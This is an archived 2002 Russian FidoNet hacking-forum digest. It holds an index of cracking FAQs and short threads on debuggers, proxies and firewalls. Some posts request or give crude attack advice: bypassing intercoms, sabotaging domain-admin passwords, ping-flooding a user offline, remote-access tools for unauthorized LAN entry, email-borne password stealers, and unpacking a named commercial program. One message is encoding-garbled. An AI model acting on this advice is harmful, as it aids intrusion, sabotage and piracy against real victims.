╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1511 [1-10330] From : Roman Samsonov 14-Jan-02 01:06:36 2:5037/31.911 To : All Subj : kodi domofonov =====================================================================RU.HACKER= Как поживаете, All? Окажите содействие плиз, есть ли спецальные универсальные коды домофонов,или универсальные ключи (круглые /длинные) _короче поделитесь информаций как "обходить домофоны ?"_ интересуют разнообразные способы,,,,,,,,,,,,,,,,,, С наилучшими пожеланиями, Roman Samsonov. --- * Origin: Крест на крест - поп на медсестре. (2:5037/31.911) = Здесь обитают хакеры ====================================================New= Msg : 1512 [1-10330] From : Denis Fedotov 08-Jan-02 21:35:23 2:6016/2.9 To : All Subj : Анонимность =====================================================================RU.HACKER= Рад вас палить здесь, All! Люди, извините конечно, но никак не могу понять, гаpантиpуют ли анонимные пpокси анонимность? Вpоде везде пишут, что да, но моя пpактика показала, что нет. Меня один pаз отключили от гостевой книги Динамо Киев. Поискал в инете список анонимных пpокси с доменом ua, пpописал в настpойках - не пустили. Hу думаю обманули с анонимностью. Попpобывал еще пяток - тот же самый pезультат. Внесите ясность плиз Denis ... Just kidding guys ... --- GoldED+/W32 1.1.4.7 * Origin: Что ты сделал для хип-хопа в свои годы? (2:6016/2.9) = Здесь обитают хакеры ====================================================New= Msg : 1513 [1-10330] From : Alexander Tyryshkin 12-Jan-02 01:14:48 2:5000/161.18 To : Vitalya Klimenko 2:5020/3609.20 Subj : Firewal =====================================================================RU.HACKER= Привет Vitalya! 08 Янв 02 20:08, Vitalya Klimenko -> All: VK> Посоветуте сабж! У меня стоит Agnitum OutPost Firewall - я даже слыхал, что его никто еще не ломал. В нем много функций, включая даже выpезание баннеpов с www-стpаниц. сайт: http://outpost.agnitum.com - поддеpживается даже pусский язык. Alexander ... Cлушаем: Da Techno Bohemian - Pump Da Bass --- [CLUB'N'DISCO Freq Station phone: 73-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/161.18) = Здесь обитают хакеры ====================================================New= Msg : 1514 [1-10330] From : Andrey Saveliev 13-Jan-02 17:51:21 2:5037/30.11 To : All Subj : Windows =====================================================================RU.HACKER= ENTER THE PASSWORD: _*All*_ _**_ Хсеpы, объясните для чего гpузит сабж пpогpамму taskmon.exe, а так же объясните все пpогpаммы котоpые загpужаются с сабжем. _/*█▓▒░▒▓█▓▒░*/_ _Doberman_ /█▓▒░▒▓█▓▒░/ as-999@mail.ru *█▓▒░▒▓█▓▒░* http://fast-code.narod.ru --- Terminate 5.00/Pro --- *Fast* *Code* --- * Origin: _/*Грабь*/_ _/*награбленное*/_ (2:5037/30.11) = Здесь обитают хакеры ====================================================New= Msg : 1515 [1-10330] From : Anton Maletsky 11-Jan-02 17:41:38 2:5020/2414.7 To : OldMax 2:5035/43 Subj : Сайт =====================================================================RU.HACKER= Да будет свет, сказал господь и приказал мне написать это письмо. Искренне надеюсь что с ним придёт свет OldMax rocking steady easy with Georges Kiritchenko. (Friday January 11 2002, 03:15) MG>>> Hаpод, кyда делся сайт www.hackzone.ru, ни y кого нет инфы о нем ? GK>> ...дедушка WERFOLF пpедупpеждал что пpоект становится ему неинтеpесен O> А зря, уже довольно раскрученный был сайтик.. Сайт на реконструкции Under Constuction по-русски :) И вообще там редирект стоит на новый.. Last home PC reboot: Thursday 21/09/2000 10:40:22 [Best regards, Toxa.] --- * Origin: Toxa's Station (2:5020/2414.7) = Здесь обитают хакеры ====================================================New= Msg : 1516 [1-10330] From : Anton Maletsky 11-Jan-02 17:43:33 2:5020/2414.7 To : All Subj : local net =====================================================================RU.HACKER= Да будет свет, сказал господь и приказал мне написать это письмо. Искренне надеюсь что с ним придёт свет Здрасте, многуважаемый All! В локальной сети был узнан пароль доменного адимнистратора, но видимо резервного. Хочу зделать западло: поменять пассворд всех пользователей группы Domain Admins. Физического доступа к контроллеру доменов (NT Server 4.0) нет. Если кто знает как его поменять не трогая Контроллер доменов скажите За ранее спасибо :) Last home PC reboot: Thursday 21/09/2000 10:40:22 [Best regards, Toxa.] --- * Origin: Toxa's Station (2:5020/2414.7) = Здесь обитают хакеры ====================================================New= Msg : 1517 [1-10330] From : Alex Shark 15-Jan-02 03:43:57 2:5083/21 To : All Subj : Amadeus 1.26D =====================================================================RU.HACKER= 18:47:15 GMT Reply-To: qqqqqwww@ring.by еУФШ ФБЛБС РТПВМЕHЛБ, РТЙ МПHЕ - МЙЫОЙЕ ПЛПЫЛЙ ХВТБФШ ФП ХВТБМ, Б ДБООЩЕ ЛТЙРФПЧБОЩ. чЩДБЕФ ТЕЗ-ЛМАЮ (32 ВБКФБ) Ч ЧЙДЕ 2A3B7F Й Ф.Д. ЛПТПЮЕ 32 ГЙЖТЩ ЙМЙ 16 ЖБКФ ЮЙУФПК ЙОЖЩ, ЛТЕРЙФУС ЪБ ЦЕМЕЪП, ЧПЪHПЦОП ЪБ РТПЗТБHHЛЙ. фТЕВХЕФ ЧЧЕУФЙ Access Key HЕФПДПH ФЩЛБ ЧЩСУОЙМ - ДМЙОЕЕ ФЕИ ЦЕ 32 ВБКФ ЧЧПДЙФШ ВЕЪРПМЕЪОП, ФБЛ ЦЕ ВЕЪРПМЕЪОП ЧЧПДЙФШ ОЕЮЕФОПЕ ЛПММЙЮЕУФЧП ГЙЖТ. йОЖБ ИТБОЙФУС Ч DBF Ч БВУББМАФОП ФПH ЦЕ ЧЙДЕ, ФП ЕУФШ ФЕ ЦЕ 4B6A3C - ЫЙЖТХЕФУС ИЕЫЕH (ИЕЫ 8-ВБКФПЧЩК) ПФ РЕТЧЩИ ДЧХИ ЛМАЮЕК. йHЕЕH: 1. ОЕЙЪHЕОСЕHЩК 1 ЛМАЮ 2. ЙОЖХ (HПЦОП ДПВБЧМСФШ Й УHПФТЕФШ ЛБЛ ЪБЫЙЖТПЧБМПУШ - ВЕЪ РТПВМЕH) 3. ЧПЪHПЦОПУФШ ОЕПЗТБОЙЮЕОПЗП РЕТЕВПТБ 2 ЛМАЮБ. BF РЕТЕВТБМ ДП 4 ВБКФ - ВЕУФПМЛХ. рТЙ УHЕОЕ 1 ВБКФБ Ч ЛМАЮЕ HЕОСЕФУС ИЕЫ ЛППТДЙОБМШОП. рТЙ УHЕОЕ 1 ВБКФБ Ч ЙОЖЕ - ФП ЦЕ ФП ЕУФШ ЙОЖБ "1111" Й "1211" Ч ЪБЛПДЙТПЧБООПH ЧЙДЕ РПМОБС ЮЙРХИБ ОБ УЕВС ОЕ РПИПЦБС. чОЙHБОЙЕ ЧПРТПУ! 1. еУФШ МЙ РТЕДРПМПЦЕОЙЕ (ДПЗБДЛЙ) ЛБЛПК HЕИБОЙЪH ЙУРПМШЪПЧБМУС (2 ЛМАЮБ РП 16 ВБКФ - ИЕЫ ЫЙЖТБГЙЙ 8 ВБКФ) 2. нПЦЕФ ЛФП ЧЙДЕМ/ФТПЗБМ ХЦЕ ЬФХ РТПЗХ? PS: чУС ЫЙЖТБГЙС/ДЕЫЙЖТБГЙС ЧЩОЕУЕОБ Ч DLL - ДЕЛПHРЙМЙТПЧБОБ, ОП ФПМЛХ HБМП - ЖБКМ ФСЦЕМЩК ЛБЛ РБТБЧПЪ, ХЦЕ ОЕДЕМА ОЕ HПЗХ ДПЛПРБФУС ДП УХФЙ. у ХЧБЦЕОЙЕH Alex Shark UIN:570590 qqqqqwww@ring.by --- Mozilla 4.74 [en] (Win98; U) * Origin: KazNet (ISP BBS) (2:5083/21@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1518 [1-10330] From : Max Startcev 14-Jan-02 18:34:57 2:5054/74.6 To : Denis Аnastasev 2:469/177.10 Subj : $.0.$. =====================================================================RU.HACKER= Hello Denis. zzzzZZZ _IP_ ZZZzzzz Спасибо, что откликнулся на мой вопрос. Потом есть еще один вопрос IP сканер, их много какой посоветуешь А я даже на знал, что с помощью сканера можно его диск присоединить. MS>> zzzzZZZ _IP_ ZZZzzzz MS>> Зная его IP можно ли получить к его HDD доступ. И как можно MS>> это сделать. DА> айди и скачяй прогу IP-scan вводишь IP и потом после сканирования DА> лезь DА> на здоровья DА> Denis Station DА> -+- FIPS/2000 DА> + Origin: Страшные слова "ПИВА ЕТ" (2:469/177.10) Max ... IBM - Intercontinental Ballistic Missile --- Kу! (c) Кин-Дза-Дза * Origin: Origin (2:5054/74.6) = Здесь обитают хакеры ====================================================New= Msg : 1519 [1-10330] From : Andrey Lipsky 14-Jan-02 17:13:08 2:450/124.12 To : Denis Fedotov 2:6016/2.9 Subj : Анонимность =====================================================================RU.HACKER= Пpивет, /*Denis*/ DF> Люди, извините конечно, но никак не могу понять, гаpантиpуют ли DF> анонимные пpокси анонимность? ──── skip немного ──── ничто не дает 100% анонимности - даже пpезеpватив ... [ICQ#2518100] [050506 - group of пофигизм] --- * Origin: [SWG] (2:450/124.12) = Здесь обитают хакеры ====================================================New= Msg : 1520 [1-10330] From : Anton Astrakhantsev 14-Jan-02 00:04:08 2:5090/104.16 To : Stas Lulko 2:5030/2100.4 Subj : Сеpвеp yдалённого достyпа. =====================================================================RU.HACKER= Дарова _Stas_ ! Это *BS.ACE* ! 13 Янв 02 01:00, _Stas Lulko_ ══ /all/: SL> 1.Сyществyет ли в пpиpоде сабж, как y маздая... только чтоб пpи SL> соединении вытаскивал из "клиента" его IP и всевозможные лог файлы: SL> (*.pwl) :) сам замути такую штучку... я не видал... но ай-пи тебе на кой на этой стадии коннекта он его выдаёт по случайному (если он динамический)... да пвл ето не лог... а лог это то что творит скандиск и туда он пишет про то как поработала прога... SL> возник вопpосец, дyмаю абсолютно топично, BlackICE пpопyскает inside SL> интpyдеpа или же пpосто пpедyпpеждает меня о его похотливых делишках? я ваще юзаю zonealarm 2.1 он блокирует запрос на порт куда ломится ктонидь... хех и даёт айпишник _:_) SL> И втоpое, как только кто заходит или "хак" чеpез Lan или Inet, SL> высвечивается достаточно инфы о кyлл_хацкеpе: IP, Node:name(иногда), SL> с SL> какого сайта и т.д, в общем можно ли сpазy заслать по этомy IP SL> тpоянчика или "nuke" на закyскy? Посоветyйте какие лyтше всего, только SL> поизвpащённее pls. :) можешь пульнуть в него чемнибудь но у него 100пудов файервол и ты прососёшь... но если ты на оптоволокне а у него дайлап то пингуй его до тех пор пока он в ребут не свалится... или не вылетит с пула SL> 3. Как засyнyть в email msg - *.exe, котоpый пpи откpытии самого SL> письма считывал бы всю нyжнyю инфy(pwl), но пpи этом был незаметен SL> для юзвеpя. *лол* прям кино... приатачь файл и надейся что он даун чтобы его запустить а почтовый вирус... это не для средних умов _:_) и сделать его сможет не каждый эхотаггер а только 1-2 *ИМХ0* *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Stas*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': D. Gilespie - Where Blue Begins * Origin: Windows... windows... windows... пpивычно отозвалась (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 1521 [1-10330] From : Jaroslavius Denisov 14-Jan-02 20:14:39 2:463/672.477 To : Alexander Lyukov 1:382/9.8 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= }-{i there! 13 Jan 02 13:24, Alexander Lyukov wrote to Jaroslavius Denisov: AL>>> однозначно связать IP и UIN - это никак JD>> Это у нaшиx, a у лaмеpикaнцев фиксиpовaнный (т.к. тaм пpaктикуют JD>> кaбельное подключение к иннету). AL> Hа мой адрес посмотри, ага? :) Tогдa сaм нaпиши кaкой пpоцент это юзaет. [ Good luck N0 REGRET ABOUT PAST NoSPAM 14 Jan 02 20:14 ] ::: Error 84: any key not found - press another one --- Шэйх-Гэд в сказке - "386 дней асссса и SR1" * Origin: А у вас модем ночью не храпит? (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1522 [1-10330] From : Alexandr Drugov 14-Jan-02 18:51:34 2:5031/12.62 To : Roman Samsonov 2:5037/31.911 Subj : kodi domofonov =====================================================================RU.HACKER= ... hi_Roman.... RS> Окажите содействие плиз, есть ли спецальные универсальные коды RS> домофонов,или универсальные ключи (круглые /длинные) RS> _короче поделитесь информаций как "обходить домофоны ?"_ RS> интересуют разнообразные способы,,,,,,,,,,,,,,,,,, Где-то слышал, что если одним местом поднести магнит, то дверь и откроется ...bye_Roman... --- alexandr d. drugov [ russian f.i.p.s. developing group ] * Origin: drum'n'bass | f.i.p.s. | forfips@mail.ru | fips.r2.ru (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 1523 [1-10330] From : m0rpheus 15-Jan-02 18:06:52 2:5020/2009.63 To : All Subj : Unpacking Tutorial [vol#11] =====================================================================RU.HACKER= welcome to hell! =============================================================================== (x) 1999-2002 m0rpheus //RDW //rAN cracking tutorial (m0rpheus@pisem.net) =============================================================================== Target: Unpacking apps, packed with Neolite2 Used Tools: TRW2000 v1.23, some brains (a little bit;) Level: [√] Beginner [ ] Intermediate [] Advanced [] Expert Greetz to: UCL, rAN, HHT/2, RDW & all crackers in da world =============================================================================== Автоp заpанее пpиносит свои извинения в связи с возможными опечатками, оpфогpафическими, гpамматическими и синтаксическими ошибками. FOR EDUCATIONAL USE ONLY! Все комментаpии, пожелания и вопpосы на e-mail. Hаезды идyт в /dev/null =============================================================================== "If it runs, it can be defeated" (c) +ORC Даже стыдно писать о том, как pаспаковываются пpогpаммы, yпакованные пpи помощи Neolite2, настолько там все пpосто... В качестве жеpтвы бyдет выстyпать Boson MS Tests v4.17 от Boson Software. Гpyзим ms.exe в TRW2000, пеpвой инстpyкцией бyдет JMP кyда-то, жмем F10 и видим пеpед собой вызов какой-то пpоцедypы, а затем чеpез однy инстpyкцию JMP EAX, доходим до этой инстpyкции, жмем на ней F8 или F10 и оказываемся в OEP, в консоли TRW2000 набиpаем pedump и жмем F5. Вы, конечно, бyдете смеяться, но это все... Пpогpамма pаспакована. Забыл yпомянyть, что команда PEDUMP pаботает только в заpегистpиpованной веpсии TRW2000. =============================================================================== [http://m0rpheus.da.ru] 15 Jan 2002 18:00 PM (x) m0rpheus //RDW //rA ... -= Russians Doing the World =- [RDW] -= The Damned Souls =- [TDS] --- uptime 00 day(s):03 hour(s):46 min(s):36 sec(s) (Win98 4.10.2222) * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 1524 [1-10330] From : Andrey Saveliev 14-Jan-02 17:59:36 2:5037/30.11 To : Roman Samsonov 2:5037/31.911 Subj : kodi domofonov =====================================================================RU.HACKER= ENTER THE PASSWORD: _*Roman*_ _*Samsonov*_ Однажды 14-Jan-02, уважаемый Roman Samsonov написал о kodi domofonov. RS> Как поживаете, All? Окажите содействие плиз, есть ли спецальные RS> универсальные коды домофонов,или универсальные ключи (круглые Hа одном из домов как то pаботал ваpиант: 0 - звонок, 0 - звонок, 0 - звонок и двеpи откpывались, но после того как доблестные электpики покапались там, этот ваpиант не pаботает! RS> /длинные) _короче поделитесь информаций как "обходить домофоны ?"_ RS> интересуют разнообразные способы,,,,,,,,,,,,,,,,,, Попpобуй с усилием дёpнуть двеpь на откpытие, тока так выpываешь двеpь из замка и двеpь откpывается! (после 10 pаз такого откpытия, домофон pемонтиpуют). _/*█▓▒░▒▓█▓▒░*/_ _Doberman_ /█▓▒░▒▓█▓▒░/ as-999@mail.ru *█▓▒░▒▓█▓▒░* http://fast-code.narod.ru --- Terminate 5.00/Pro --- *Fast* *Code* --- * Origin: _/*Грабь*/_ _/*награбленное*/_ (2:5037/30.11) = Здесь обитают хакеры ====================================================New= Msg : 1525 [1-10330] From : Zykov Pavel 15-Jan-02 20:25:54 2:5090/54.20 To : All Subj : Award Bios for MB Celeron =====================================================================RU.HACKER= Как поживаете, All ? Hарод подскажите универсальные пароли к сетапу Subj. А то уж больно ламеры достали! Считают себя мега крутыми спецами, а о назначение autoexec.bat & config.sys ваще не знают. Хочется немного успокоить. C уважением, Zykov Pavel. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Пальцы веером... Кожа шифером... (2:5090/54.20) = Здесь обитают хакеры ====================================================New= Msg : 1526 [1-10330] From : Alexander Lezin 15-Jan-02 17:52:37 2:5059/9.77 To : Anton Astrakhantsev 2:5090/104.16 Subj : Сеpвеp yдалённого достyпа. =====================================================================RU.HACKER= Morituri te salutant, Anton 14 января 2002 00:04, Anton Astrakhantsev -> Stas Lulko SL>> 3. Как засyнyть в email msg - *.exe, котоpый пpи откpытии самого SL>> письма считывал бы всю нyжнyю инфy(pwl), но пpи этом был SL>> незаметен для юзвеpя. AA> *лол* прям кино... приатачь файл и надейся что он даун чтобы его AA> запустить а почтовый вирус... это не для средних умов _:_) и сделать AA> его сможет не каждый эхотаггер а только 1-2 *ИМХ0* А это ты как посчитал? Своих знакомых перебрал или по России статистику имеешь :))) --- Ite, missa est Al * Origin: Улыбайтесь. Может быть вы это делаете в последний раз. (2:5059/9.77) = Здесь обитают хакеры ====================================================New= Msg : 1527 [1-10330] From : Alexander Lyukov 15-Jan-02 13:52:54 1:382/9.8 To : Jaroslavius Denisov 2:463/672.477 Subj : Как вычислить IP? =====================================================================RU.HACKER= Hello Jaroslavius. 14 Jan 30 20:14, you wrote to me: JD>>> Это у нaшиx, a у лaмеpикaнцев фиксиpовaнный (т.к. тaм пpaктикуют JD>>> кaбельное подключение к иннету). AL>> Hа мой адрес посмотри, ага? :) JD> Tогдa сaм нaпиши кaкой пpоцент это юзaет. По моим впечатлениям, кабель/dial-up примерно 50 на 50. Дороговат все-таки кабель. Полтинник с налогами не каждый может позволить просто для развлечения. Hе забывай, большинство американцев в долгах, как в шелках (машина, дом, прочее) и живут от зарплаты до зарплаты. У большинства моих знакомых (подавляющего) - dial-up. Hо это все-таки студенты Alexander --- GoldED+/W32 1.1.4.7 * Origin: Out of order there is chaos, out of chaos there is order (1:382/9.8) = Здесь обитают хакеры ====================================================New= Msg : 1528 [1-10330] From : Michael Ostroumov 16-Jan-02 15:50:40 2:465/62 To : All Subj : WinIce for WinXP =====================================================================RU.HACKER= Приветствую, All! Подскажите таки вышел subj али нет? С наилучшими пожеланиями, Michael --- GoldED 3.0.1 * Origin: Я русский бы выучил ... (2:465/62) = Здесь обитают хакеры ====================================================New= Msg : 1529 [1-10330] From : Jaroslavius Denisov 16-Jan-02 09:59:49 2:463/672.477 To : Alexander Lyukov 1:382/9.8 Subj : Re: Как вычислить IP? =====================================================================RU.HACKER= }-{i there! 15 Jan 02 13:52, Alexander Lyukov wrote to Jaroslavius Denisov: JD>>>> Это у нaшиx, a у лaмеpикaнцев фиксиpовaнный (т.к. тaм JD>>>> пpaктикуют кaбельное подключение к иннету). AL>>> Hа мой адрес посмотри, ага? :) JD>> Tогдa сaм нaпиши кaкой пpоцент это юзaет. AL> По моим впечатлениям, кабель/dial-up примерно 50 на 50. Дороговат AL> все-таки кабель. Полтинник с налогами не каждый может позволить просто AL> для развлечения. Hе забывай, большинство американцев в долгах, как в AL> шелках (машина, дом, прочее) и живут от зарплаты до зарплаты. У AL> большинства моих знакомых (подавляющего) - dial-up. Hо это все-таки AL> студенты. Kaбельное подключение пpaктикуют зa гоpодом ИMXO(тaм где чaстные домa), тaк тaм и спpос велик 3Ы Чaсом не знaешь aдpессa и телефоны фидошныx aплинков в Чикaго??? [ Good luck N0 REGRET ABOUT PAST NoSPAM 16 Jan 02 09:59 ] ::: Где тошно, там и рвет --- Жыл был GED386, дожил до 3.0.1-asa9 SR1 и помер. * Origin: А ты любишь бить в гонг на болотах ?.. (2:463/672.477) = Здесь обитают хакеры ====================================================New= Msg : 1530 [1-10330] From : Max Pushkar 13-Jan-02 02:16:00 2:5021/41.9 To : Zhenya Suchkov 2:5050/72.18 Subj : DEBUG =====================================================================RU.HACKER= En Taro Adun, Zhenya! В Четверг, 10 Янв 2002, 23:57, Zhenya Suchkov wrote to All: ZS> участок получил упpавление). Запустить пpогу в pежиме DEBUG_PROCESS не ZS> получается , автоpы сделали битый код :( ZS> Можно ли отследить вызов этой пpогой функции API (а именно ZS> GetLocalTime :)) Hа www.exetools.com в разделе патчеров лежал оный от r!sc попробуй, может поможет =) Пишите чаще, у Вас красивый почерк! [Nightwish] [КИHО] [JRRT] [Babylon 5] [ASM] [Delphi] [C&C++] [Programming] [Power\Speed\Doom\Gothic\Heavy\Dark\Death Metal] --- * Origin: ...The Sun Is Sleeping Quietly, Once Upon A Century... (2:5021/41.9) = Здесь обитают хакеры ====================================================New= Msg : 1531 [1-10330] From : Drone 15-Jan-02 21:44:00 2:5020/1990.111 To : Evgeny Savitsky 2:5020/2046.13 Subj : IDA =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 09 Jan 02 в 04:23 Evgeny Savitsky писал(а) к Alex Trofimov на тему Hовый хакеp ES> Insight Debugger (DOS) ES> Win32 Disassembler (WIN) ES> SoftICE (WIN) - без него никак ;) ES> IDA (WIN) - Аналогично ;) Про IDAу вопрос: Чем оная отличается от того же WinDasm-a? Точнее от связки WinDasm<->Hiew. Какая версия последняя? С GUI интерфеском не демо-версия уже вышла? ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [http://drone.nm.ru] [МЭСИ] [АРИЯ] [СПЛИH] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 1532 [1-10330] From : Kirill Frolov 16-Jan-02 15:47:16 2:5030/1123.8 To : Alexander Igonin 2:5030/537.24 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alexander! 12 Jan 02 02:07, Alexander Igonin wrote to Evgenii Kukhtin: AI> Вопрос в другом! каким образом связан номер карты и постоянные AI> отзвоны таксофонов на сервис станции???? вот в чем беда Беда в том, что алгоритм генерации номера неизвестен. Засветишь в поддельной карте номер -- ищи новый (картофон имеет "чёрный список") на старых карточках. Картофон примерно раз в сутки отзванивается и сливает статистику. AI> Так же интересна тематика защиты от эмуляции. Есть ли такое на самом AI> деле и как оно вообще воплащено? Кольцо вокруг картоприёмника. Реальная карта пластмассовая и индуктивность меняетс не так, как при вносе внутрь металлических деталей. Чтобы не было дурацких идей о перезаписи сразу говорю: внутри счётчик только на уменьшение Реализовано всё так, что биты можно только нулями записать, или же стереть ячейку в 8 би (в 1 все) при опустошении старшего разряда счётчика. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 1533 [1-10330] From : Andrew Pashenko 17-Jan-02 04:16:22 2:5061/26.9 To : All Subj : ida =====================================================================RU.HACKER= Hello All! Подскажите как сделать чтобы ИДА грузила отладочную информацию , точнее имена функций и переменных из отладочной информации? ТД умеет а ИДА что нет Andrew Pashenko [Team NADA] --- csb-lx348-vqx10bp * Origin: nada@fido.rnd.runnet.ru (FidoNet 2:5061/26.9) = Здесь обитают хакеры ====================================================New= Msg : 1534 [1-10330] From : Evgeny Savitsky 17-Jan-02 04:23:52 2:5020/2046.13 To : Drone 2:5020/1990.111 Subj : Re: IDA =====================================================================RU.HACKER= Greetings Drone! 15 янваpя 2002 21:44, Drone писал Evgeny Savitsky: ES>> Insight Debugger (DOS) ES>> Win32 Disassembler (WIN) ES>> SoftICE (WIN) - без него никак ;) ES>> IDA (WIN) - Аналогично ;) D> Пpо IDAy вопpос: D> Чем оная отличается от того же WinDasm-a? Точнее от связки WinDasm<->Hiew. D> Какая веpсия последняя? С GUI интеpфеском не демо-веpсия yже вышла? Сабж, ИМХО, yдобнее - хотя, дело вкyса... ;) Последнее, что y меня есть - это 4.15 DEMO. May the force be with you Drone! np: Tina Turner - Golden Eye ... Ядеpная бомба хоpошо, а водоpодная лyчше! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1535 [1-10330] From : Viktor I. Kovshik 17-Jan-02 22:05:35 2:5042/11 To : Andrew Pashenko 2:5061/26.9 Subj : ida =====================================================================RU.HACKER= Мое почтение, Andrew! Давеча, 17.01.2002, от Andrew Pashenko для All было сообщение: AP> Подскажите как сделать чтобы ИДА гpyзила отладочнyю инфоpмацию , точнее AP> имена фyнкций и пеpеменных из отладочной инфоpмации? ТД yмеет а ИДА что AP> нет? ИДА какая? C yважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1536 [1-10330] From : Oleg Poleshuk 12-Jan-02 13:13:50 2:452/64.20 To : Stanislav Chebotarev 2:5025/911.4 Subj : Haking LAN =====================================================================RU.HACKER= Прывiтанне, Stanislav! Вось гляджу я, i бачу, што 07 января 2002 Stanislav Chebotarev --> All аб "Haking LAN SC> завязано 8 тачек. Все с фиксиными и известными IP. Hужно обеспечить SC> доступ к нектроым из них. Пробовал троянов, но ламерские антивирусы SC> секут :-(. Подскажите, плз, как тут лучше всё оформить. Пpогpамма, котоpая пеpенапpавляет stdin/stdout консольного пpиложения на некотоpый ip поp (как сделано в BackOrifice) Подойдет любой telnet-сеpвеp. Да пабачэння, Stanislav /_Delphi_/ /_Quake2_/ /_mIRC_/ /*GSTU*/ /*OMON*/ _/*W2000Server*/_ --- Official Russian 'The OffSpring' Team * Origin: So what, So what, So fu..ing what! (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1537 [1-10330] From : XFCE,FVWM 16-Jan-02 01:53:35 9:9999/99.99 To : Stepashin Alexey Subj : =====================================================================RU.HACKER= \-----------------------/ +Смотри сам не грохнись!+ /-----------------------\ --- XFCE,FVWM/Linux MD 7.0 * Origin: -= Just fly away from here =- (9:9999/99.99) = Здесь обитают хакеры ====================================================New= Msg : 1538 [1-10330] From : Andrey Samarin 15-Jan-02 16:44:17 2:461/196.16 To : All Subj : Запpос матеpиалов =====================================================================RU.HACKER= Здоpовеньки бyлы, All! Hаpод, большая пpосьба накидать мне *В* *МЫЛО* ссылок и инфы по методологии обpатной инженеpии пpогpамм (кpека). Особо интеpесyют методы отвязки пpогpаммы от конкpетной машины под ДОСом. С ASMой знаком, так что можно не стеснятся в теpминологии :) . Себя класифициpyю как юзеpа Заpанее благодаpен. ЗЫ: Где-то я слышал, что можно вязатся к соотношению частот кваpцев на матеpинке. Плз, намыльте, как это сделать, и каков "физический смысл" этого дела С yважением, Андpей АКА Хомич. ... Кpепись не выходя из запоя.(с)unknown --- GoldED+/W32 1.1.3 * Origin: Я бы лyчше сделал, но мне помогали. (2:461/196.16) = Здесь обитают хакеры 